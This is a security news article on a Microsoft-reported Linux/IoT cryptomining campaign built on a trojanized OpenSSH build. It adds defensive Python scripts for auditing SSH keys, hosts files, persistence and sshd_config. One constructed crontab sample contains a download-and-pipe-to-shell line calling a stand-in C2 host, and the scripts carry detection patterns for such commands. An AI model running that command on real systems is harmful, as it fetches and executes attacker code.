Weaponized OpenSSH

Cybersecurity researchers at Microsoft recently found an attack targeting Linux-based systems and IoT devices.

The attack uses custom and open-source tools to take control of the affected devices and install cryptomining malware on them, relying on a modified ("patched") OpenSSH build.


Using criminal infrastructure that includes a subdomain of a Southeast Asian financial institution as its C2 server, the threat actors deploy a backdoor.

The backdoor then uses several tools, including rootkits and an IRC bot, to hijack device resources for mining.

Here below, we have mentioned the tasks that the backdoor performs:-

  • Deploys a patched OpenSSH build
  • Hijacks SSH credentials
  • Moves laterally
  • Hides malicious connections

The complexity and scope of the attack, together with the steps taken to evade detection, show how determined the attackers were.

Weaponized OpenSSH Tool Used

The attack starts with the threat actors brute-forcing credentials on misconfigured, internet-facing Linux devices.

Once a device is compromised, they disable shell history and fetch a trojanized OpenSSH archive (openssh-8.0p1.tgz) from a remote server.

The archive carries a backdoor shell script and a trojanized OpenSSH binary, which are deployed together and add two public keys for persistent SSH access.

This enables information harvesting and the installation of the Reptile and Diamorphine LKM rootkits, which cloak malicious activity on compromised systems.

The backdoor also eliminates rival miners, adds iptables rules, and modifies ‘/etc/hosts’ to block competitor traffic.

It identifies and terminates miner processes, blocks file access, and removes SSH access that other threat actors had configured in authorized_keys.
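The artifacts described in this section (added public keys in authorized_keys, /etc/hosts entries that sinkhole competitor traffic, and shell history being switched off) are all things a responder can check for on a suspect host. The following Python script is an added example written for this article, not Microsoft's or the article's code; every input is a constructed sample string so it runs offline, and the allow-list of known key blobs is an assumption you would replace with the keys your organisation actually issued.

```python
"""Host triage for the backdoor artifacts described above.

Added example, not Microsoft's or the article's code. All inputs are
constructed strings so the script runs offline; on a host under
investigation, read the real files (~/.ssh/authorized_keys, /etc/hosts,
~/.bashrc and similar) and pass their contents to the same functions.
"""
import re
from typing import List, Set

# Constructed ~/.ssh/authorized_keys: one key the organisation issued, two it did not.
SAMPLE_AUTHORIZED_KEYS = """\
# constructed sample
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownKey0000000000000000000000 admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/ExampleUnknownKeyOne unknown1
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/ExampleUnknownKeyTwo unknown2
"""

# Allow-list of key blobs the organisation actually provisioned (constructed assumption).
KNOWN_KEY_BLOBS: Set[str] = {
    "AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownKey0000000000000000000000",
}

# Constructed /etc/hosts: two normal loopback lines plus two names being sinkholed.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
0.0.0.0 pool.example-miner.test
127.0.0.1 stratum.example-rival.test   # constructed rival-miner entry
"""

# Constructed ~/.bashrc with the history-disabling lines an intruder might add.
SAMPLE_BASHRC = """\
alias ll='ls -la'
unset HISTFILE
export HISTSIZE=0
"""

LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")
HISTORY_DISABLE_PATTERNS = [
    re.compile(r"^\s*(export\s+)?HISTFILE=\s*/dev/null"),
    re.compile(r"^\s*unset\s+HISTFILE\b"),
    re.compile(r"^\s*(export\s+)?HIST(FILE)?SIZE=\s*0\b"),
    re.compile(r"^\s*set\s+\+o\s+history\b"),
]


def unknown_authorized_keys(content: str, known_blobs: Set[str]) -> List[str]:
    """Return 'keytype comment' for every key whose base64 blob is not on the allow-list.

    An authorized_keys line is '[options] keytype base64 [comment]'; the key
    type token is located first so option prefixes do not confuse the parse.
    """
    findings = []
    for line in content.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        for i, tok in enumerate(parts):
            if tok.startswith(KEY_TYPE_PREFIXES) and i + 1 < len(parts):
                blob = parts[i + 1]
                if blob not in known_blobs:
                    comment = parts[i + 2] if i + 2 < len(parts) else "<no comment>"
                    findings.append(f"{tok} {comment}")
                break
    return findings


def sinkholed_hosts(content: str) -> List[str]:
    """Return names mapped to a null or loopback address that are not standard loopback names."""
    out = []
    for raw in content.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        if addr in ("0.0.0.0", "127.0.0.1", "::1"):
            out.extend(n for n in names if n not in LOOPBACK_NAMES)
    return out


def history_disabled(content: str) -> List[str]:
    """Return shell rc lines that disable or discard command history."""
    return [line.strip() for line in content.splitlines()
            if any(p.search(line) for p in HISTORY_DISABLE_PATTERNS)]


if __name__ == "__main__":
    for title, hits in (
        ("unknown authorized_keys entries", unknown_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEY_BLOBS)),
        ("sinkholed /etc/hosts names", sinkholed_hosts(SAMPLE_HOSTS)),
        ("history-disabling rc lines", history_disabled(SAMPLE_BASHRC)),
    ):
        print(f"{title}: {hits}")
```

Two caveats for live use: a host's own name mapped to 127.0.0.1 will show up in `sinkholed_hosts` and needs to be reviewed by hand, and the LKM rootkits named in the article hide their own modules, so a matching check of /proc/modules is not included because it would give false reassurance.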

Attack Flow

The attackers deploy the ZiggyStarTux IRC bot (based on the Kaiten malware), which has DDoS capabilities and can execute bash commands. To maintain persistence, the backdoor malware uses techniques such as:-

  • Replicating binaries across multiple disk locations
  • Establishing cron jobs for periodic execution

Moreover, ‘ZiggyStarTux’ is registered as a systemd service, with its service file located at:-

  • /etc/systemd/system/network-check.service
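Both persistence techniques leave plain-text artifacts that can be audited: a unit file under /etc/systemd/system and crontab entries. The Python script below is an added example written for this article, not Microsoft's or the article's code. The only indicator taken from the report is the unit name network-check.service; the unit files, crontab lines and the list of suspicious directories are constructed assumptions, and on a live host you would feed it the real unit and crontab contents.

```python
"""Persistence audit for the systemd-service and cron techniques described above.

Added example, not Microsoft's or the article's code. The unit and crontab
texts are constructed so the script runs offline; on a live host, feed it
the contents of /etc/systemd/system/*.service and the system and user crontabs.
"""
import configparser
import re
from typing import List

# Directories from which a legitimate service or cron job should not execute (assumption).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/user/")

# The one indicator taken from the report: the unit name the backdoor registers.
KNOWN_BAD_UNITS = {"network-check.service"}

# Constructed unit file imitating the shape of such a persistence entry.
SAMPLE_BAD_UNIT = """\
[Unit]
Description=Network connectivity check
After=network.target

[Service]
ExecStart=/dev/shm/.x/network-check
Restart=always

[Install]
WantedBy=multi-user.target
"""

# Constructed benign unit for comparison.
SAMPLE_GOOD_UNIT = """\
[Unit]
Description=Nightly backup

[Service]
Type=oneshot
ExecStart=/usr/local/bin/backup --nightly
"""

# Constructed crontab: a temp-dir job, a download-and-pipe-to-shell job, a benign job.
SAMPLE_CRONTAB = """\
MAILTO=root
*/5 * * * * /var/tmp/.cache/run.sh >/dev/null 2>&1
*/10 * * * * curl -s http://c2.invalid/x.sh | sh
@reboot /usr/local/bin/backup --check
"""

CRON_LINE = re.compile(r"^(@\w+|(\S+\s+){5})(?P<cmd>.+)$")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def audit_unit(unit_name: str, unit_text: str) -> List[str]:
    """Return reasons a systemd unit looks like malware persistence (empty if none)."""
    reasons = []
    if unit_name in KNOWN_BAD_UNITS:
        reasons.append(f"{unit_name}: name matches a reported indicator")
    parser = configparser.ConfigParser(strict=False, interpolation=None)
    parser.optionxform = str  # keep key case such as ExecStart
    parser.read_string(unit_text)
    exec_start = parser.get("Service", "ExecStart", fallback="")
    # systemd permits prefix characters (-, @, :, +, !) before the executable path
    path = exec_start.split()[0].lstrip("-@:+!") if exec_start.strip() else ""
    if path.startswith(SUSPICIOUS_DIRS):
        reasons.append(f"{unit_name}: ExecStart runs from a temporary directory ({path})")
    if "/." in path:
        reasons.append(f"{unit_name}: ExecStart path has a hidden component ({path})")
    return reasons


def audit_crontab(crontab_text: str) -> List[str]:
    """Return reasons crontab entries look like malware persistence."""
    reasons = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        m = CRON_LINE.match(line)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        if any(d in cmd for d in SUSPICIOUS_DIRS):
            reasons.append(f"cron job runs from a temporary directory: {cmd}")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append(f"cron job downloads and pipes to a shell: {cmd}")
    return reasons


if __name__ == "__main__":
    for name, text in (("network-check.service", SAMPLE_BAD_UNIT), ("backup.service", SAMPLE_GOOD_UNIT)):
        print(name, audit_unit(name, text))
    print("crontab", audit_crontab(SAMPLE_CRONTAB))
```

The unit check keys on where the executable lives and on the reported unit name, not on the service description, because the description is what an attacker chooses to make the entry look innocuous. Binaries replicated to several disk locations, the other technique the article lists, are best caught by hashing each ExecStart target and looking for the same hash at unexpected paths.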

The bots are instructed to download and execute shell scripts that brute-force live hosts and backdoor vulnerable systems with the trojanized OpenSSH package.

According to Microsoft’s report, after moving laterally through the network the attacker aims to install mining malware targeting “Linux-based Hiveon OS systems”.

Mitigations

Here below, we have mentioned the mitigations recommended by the security researchers at Microsoft:-

  • Ensure that the settings of devices are configured securely.
  • Make sure to keep your devices healthy by regularly updating them.
  • Make use of limited access privileges to strengthen security measures.
  • Make sure to update OpenSSH to the latest version for optimal performance and security.
  • Implement a complete and robust security solution for your IoT devices.
  • Make use of security solutions that offer detection capabilities and the ability to monitor multiple domains.
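Because the intrusion begins with credential brute-forcing over SSH, the most concrete form of "configure devices securely" and "limit access privileges" here is the sshd configuration itself. The Python script below is an added example written for this article, not Microsoft's or the article's code; it parses sshd_config text and reports the settings that leave the brute-force entry point open. The weak and hardened configurations are constructed, the four-attempt limit is this example's own threshold, and directives inside Match blocks are conditional and deliberately not audited.

```python
"""sshd_config audit against the brute-force entry point described in this article.

Added example, not Microsoft's or the article's code. The two configurations
below are constructed; on a real host pass the text of /etc/ssh/sshd_config.
"""
from typing import Dict, List

# Constructed config resembling a default image that still allows password logins.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 10
"""

# Constructed hardened config: key-only logins, no root, few attempts per connection.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 3
AllowGroups ssh-users
"""

# Values sshd applies when a directive is absent (OpenSSH 7.0 and later).
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
    "maxauthtries": "6",
}
MAX_AUTH_TRIES_LIMIT = 4  # this example's threshold, not an OpenSSH default


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Map lower-cased directive names to their effective (first-seen) value."""
    values: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break  # everything after the first Match block is conditional
        values.setdefault(key, value)  # sshd honours the first occurrence of a directive
    return values


def audit_sshd_config(text: str) -> List[str]:
    """Return the settings that leave password brute-forcing feasible (empty if hardened)."""
    cfg = parse_sshd_config(text)

    def effective(directive: str) -> str:
        return cfg.get(directive, DEFAULTS[directive]).lower()

    findings = []
    if effective("passwordauthentication") == "yes":
        findings.append("PasswordAuthentication yes: credentials can be brute-forced; set no and use keys")
    if effective("permitrootlogin") == "yes":
        findings.append("PermitRootLogin yes: root is a guessable username; set no")
    if effective("permitemptypasswords") == "yes":
        findings.append("PermitEmptyPasswords yes: set no")
    if effective("pubkeyauthentication") != "yes":
        findings.append("PubkeyAuthentication is off: keys are the replacement for passwords")
    try:
        tries = int(effective("maxauthtries"))
    except ValueError:
        tries = int(DEFAULTS["maxauthtries"])
    if tries > MAX_AUTH_TRIES_LIMIT:
        findings.append(f"MaxAuthTries {tries}: lower to {MAX_AUTH_TRIES_LIMIT} or fewer to slow guessing")
    return findings


if __name__ == "__main__":
    print("weak:", audit_sshd_config(WEAK_CONFIG))
    print("hardened:", audit_sshd_config(HARDENED_CONFIG))
```

Run it against an empty string to see why absent directives matter: with nothing set, sshd still accepts passwords by default, which is exactly the state the attackers in this article rely on. Keeping OpenSSH current, the article's other recommendation, matters independently because the trojanized build replaced the system binary; a package-manager integrity check (for example `rpm -V openssh` or `dpkg -V openssh-server`) is the corresponding detective control.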


Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.